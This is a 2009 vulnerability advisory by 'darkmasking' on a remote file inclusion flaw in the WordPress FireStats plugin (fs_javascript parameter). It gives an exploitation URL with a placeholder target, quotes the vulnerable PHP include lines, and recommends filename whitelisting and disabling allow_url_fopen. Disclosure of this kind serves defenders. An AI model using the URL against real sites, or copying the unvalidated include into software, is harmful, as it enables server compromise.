[»]===============================================================================================================[_][-][X] [»] [»] [»] WordPress Plugin FireStats <= 1.6.1-stable (fs_javascript) RFI Vulnerability [»] [»] [»] [»] ======= ------d-------m------ ==== ==== [»] [»] || = | |(o o)| | || || || [»] [»] || = ||(~)|| || || [»] [»] ======= /|\ || || [»] [»]=====================================================================================================================[»] [»] Author : darkmasking [»] [»] Date : June, 13th 2009 [»] [»] Contact : darkmasking[at]gmail.com [»] [»] Critical Level : Dangerous *red* [»] [»]---------------------------------------------------------------------------------------------------------------------[»] [»] Affected software description : [»] [»] Software : FireStats Version 1.6.1-stable [FireStats is a web statistics system] [»] [»] Vendor : http://firestats.cc/ [»] [»] Price : $25.00 ( commercial usage ) [»] [»]=====================================================================================================================[»] [»] [»] [»] [~] RFI : [»] [»] [»] [»] http://www.TARGET.com/[path]/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=[darkc0de] [»] [»] [»] [»]---------------------------------------------------------------------------------------------------------------------[»] [»] [»] [»] [~] Vuln : firestats-wordpress.php :Line 36 [»] [»] [»] [»] $path = fs_get_firestats_path(); [»] [»] $file = $_GET['fs_javascript']; [»] [»] unset($_GET['fs_javascript']); [»] [»] if (strpos($file,"..") !== false) die(".. is not allowed in fs_javascript"); [»] [»] require_once("$path/$file"); [»] [»] [»] [»]---------------------------------------------------------------------------------------------------------------------[»] [»] [»] [»] [~] Vulnerability description : [»] [»] [»] [»] This script is possibly vulnerable to file inclusion attacks. [»] [»] [»] [»] It seems that this script includes a file which name is determined using user-supplied data. [»] [»] This data is not properly validated before being passed to the include function. [»] [»] [»] [»]---------------------------------------------------------------------------------------------------------------------[»] [»] [»] [»] [~] How to fix this vulnerability : [»] [»] [»] [»] Edit the source code to ensure that input is properly validated. Where is possible, [»] [»] it is recommended to make a list of accepted filenames and restrict the input to that list. [»] [»] [»] [»] For PHP, the option allow_url_fopen would normally allow a programmer to open, [»] [»] include or otherwise use a remote file using a URL rather than a local file path. [»] [»] It is recommended to disable this option from php.ini. [»] [»] [»] [»]---------------------------------------------------------------------------------------------------------------------[»] [»] [»] [»] [~] Greetz : [»] [»] [»] [»] Sorry bro lom ada teman jadi tuk diri sendiri aja! [»] [»] [»] [»] [»] [»]=====================================================================================================================[»]